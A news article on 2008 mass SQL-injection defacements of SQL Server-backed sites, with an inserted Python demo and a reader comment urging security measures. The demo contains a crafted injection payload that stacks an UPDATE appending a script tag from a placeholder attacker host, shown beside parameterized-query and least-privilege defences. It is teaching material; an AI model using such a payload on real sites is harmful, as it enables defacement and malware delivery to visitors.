Security expert: Don't blame Microsoft for mass site defacements
Progress was made Monday in cleaning up the thousands of database-backed Web sites into which attackers had injected references to malicious JavaScript. However, one security expert says we can expect more such attacks in the near future.
A traditional SQL injection attack lets an attacker run his own commands on an application's database by supplying input that the application splices, unchecked, into a SQL query. "What's different about this latest attack is the size and the level of sophistication," said Jeremiah Grossman, CTO of WhiteHat Security.

On Monday, CNET found a few sites still infected with the latest SQL-injection attack.
In the past, attackers have gone after a small niche of the Internet, say travel sites or sports sites, but with this latest attack they have a generic way to blast the Internet, and they have chosen to go after sites backed by Microsoft SQL Server.
On Friday, Microsoft denied that new vulnerabilities within Internet Information Services are to blame for a rash of Web site defacements. Microsoft insists it's the application developer's responsibility to follow the company's best practices. These include constraining and sanitizing input data, using type-safe SQL parameters for data access, and restricting account permissions in the database.
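The three practices Microsoft points to map onto three separate lines of defense, and it helps to see all three fail or hold against the same input. The following is an added example, not code from the article or from any of the attacked sites: it uses Python with sqlite3 standing in for a classic ASP page and a SQL Server database. The table contents, the attacker payload and the hostname in it are constructed for the demonstration. One assumption is stated in the code: sqlite3's executescript() is used in the vulnerable path because it runs every statement in the string, which is how SQL Server treats a command text containing several statements; sqlite's ordinary execute() would refuse the stacked UPDATE and hide the problem.

```python
import os
import sqlite3
import tempfile

# Constructed sample content (not data from the article): a tiny CMS table.
SAMPLE_ROWS = [
    (1, "Welcome to our store"),
    (2, "Spring sale starts Monday"),
]

# Constructed attacker value for a page-id request parameter. It closes the
# quoted string, appends an UPDATE that tags a script reference onto every
# row, and comments out whatever the application appends afterwards.
# The hostname is a placeholder, not one from the article.
PAYLOAD = (
    "1'; UPDATE pages SET body = body || "
    "'<script src=\"http://attacker.invalid/x.js\"></script>'; --"
)


def make_db(path=":memory:"):
    """Create and populate the sample table; returns an open connection."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def all_bodies(conn):
    """Current contents of the body column, in id order."""
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]


def vulnerable_lookup(conn, page_id):
    """Classic-ASP style: the request parameter is concatenated into the SQL.

    Assumption: executescript() models SQL Server batch behaviour, where a
    command text holding several statements runs all of them, so the
    attacker's UPDATE executes right after the intended SELECT.
    """
    sql = "SELECT body FROM pages WHERE id = '" + page_id + "'"
    conn.executescript(sql)
    return all_bodies(conn)


def hardened_lookup(conn, page_id):
    """Constrain the input (a page id must be an integer) and bind it as a
    typed parameter, so it is never parsed as SQL text."""
    try:
        pid = int(page_id)
    except (TypeError, ValueError):
        raise ValueError("page id must be an integer")
    row = conn.execute("SELECT body FROM pages WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else None


def attack_blocked_by_readonly_account():
    """Third layer: least privilege. The web tier's database login has no
    UPDATE right (modelled here as a read-only sqlite connection), so even
    the vulnerable code cannot deface the table. Returns True when the
    injected UPDATE is refused and the rows are untouched."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "site.db")
        make_db(path).close()
        web_conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
        try:
            vulnerable_lookup(web_conn, PAYLOAD)
            blocked = False
        except sqlite3.OperationalError:  # "attempt to write a readonly database"
            blocked = True
        finally:
            web_conn.close()
        check = sqlite3.connect(path)
        untouched = all_bodies(check) == [body for _, body in SAMPLE_ROWS]
        check.close()
    return blocked and untouched


if __name__ == "__main__":
    print("vulnerable, after payload:", vulnerable_lookup(make_db(), PAYLOAD))
    print("hardened, normal id:", hardened_lookup(make_db(), "1"))
    try:
        hardened_lookup(make_db(), PAYLOAD)
    except ValueError as exc:
        print("hardened, payload rejected:", exc)
    print("read-only account blocks defacement:", attack_blocked_by_readonly_account())
```

Note what each layer buys. Input constraint alone stops this payload because a page id is numeric; for free-text fields it would not, which is why the parameterized query is the load-bearing fix. The restricted account does not fix the bug, but it turns a site-wide defacement into a failed query, which is exactly the outcome the affected sites would have wanted while they patched their code.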
Grossman agreed it's not Microsoft's fault, and said the attacks could just as easily have targeted another vendor's software. If users visit a site carrying the injected code, their browser is directed to download a variety of exploits, not all of them aimed at Microsoft products. A Shadowserver Foundation page lists exploits affecting Real and other vendors' software alongside various Microsoft Security Bulletins.
Grossman said that simply turning off JavaScript won't necessarily protect end users from this latest round of attacks, since the attackers can use plain HTML as well; an injected iframe, for instance, pulls in an exploit page without any script running in the victim's browser.
"It's said that the attacks never get worse, they only get better," Grossman said. But in terms of the good guys closing the gap with the attackers, he remains optimistic. He said with more diligence and more care, we can protect Web sites from these attacks.
As CNET's resident security expert, Robert Vamosi has been interviewed on the BBC, CNN, MSNBC, and other outlets to share his knowledge about the latest online threats and to offer advice on personal and corporate security. Listen to his podcast at securitybites.cnet.com or e-mail Robert with your questions and comments.

So, what do we do about it?
by MEE-S31, May 4, 2008 5:14 PM PDT

Ok I think I am getting some traction on the don't blame the victim message, so now what do we do about it?

My thought is that MS and McAfee, Avert, all the development houses are working at what they can do as fast as they can.
With Microsoft and its secure development lifecycle they are trying to make their software as safe as they can. The AV writers are working overtime keeping up with virus signatures.
Governments, police and militaries seem to be handicapped, not enough manpower, poor focus or something. They have problems finding, and if they can find them, getting to the major MalZ.
We need to sit down, look at the issue and then figure out what to do about it.
To this end I have started S31. A school of systems and applications experts and leaders in the internet martial arts. We have taken it upon ourselves to focus our attention not on describing the problem or looking at ways to protect our systems, but on what can be done to combat the attacks we have been subjected to for so long.
Clearly trying to bring the MalZ to justice using arrests and prosecution is not working. This mostly falls into the problem of jurisdictions and the fact that a lot of these are either by governments or allowed by governments that are not exactly friendly to the West.
Also, creating technical means to stop the attacks is not working to its full potential. While these efforts have been good enough up until now, good enough does not mean perfect. We and all who want to be free on the internet appreciate their efforts and encourage them to keep up what they are doing, as it is very important. But we need something more.
In the last few weeks we have been encouraged by other's efforts in testing techniques to possibly fight back. We need to keep up this research.
S31 will be continuing these efforts in parallel with other researchers as well as defining requirements for the work ahead.
So for now, patch your systems with every patch you can. Run a good virus scanner in an active scanning role. Use two firewalls, a hardware firewall at your internet connection and a software firewall on every single PC you own.
Use good malware scanners, use two just to be sure. We also recommend using a second antivirus on a manual scan once in a while, once a week if you are on the net much, once a month otherwise.
Be on the lookout for any and all social engineering, phishing and whaling. Educate the people around you. Teach them how to protect themselves. And keep at it; people get complacent once they have been uninfected for a while. People don't want to have to be security experts, they just want to read their email and surf the web. We hope that in the future they can do just that.
And remember don't blame the victim, it doesn't help anybody and makes us take our focus off of the people who are the real problem.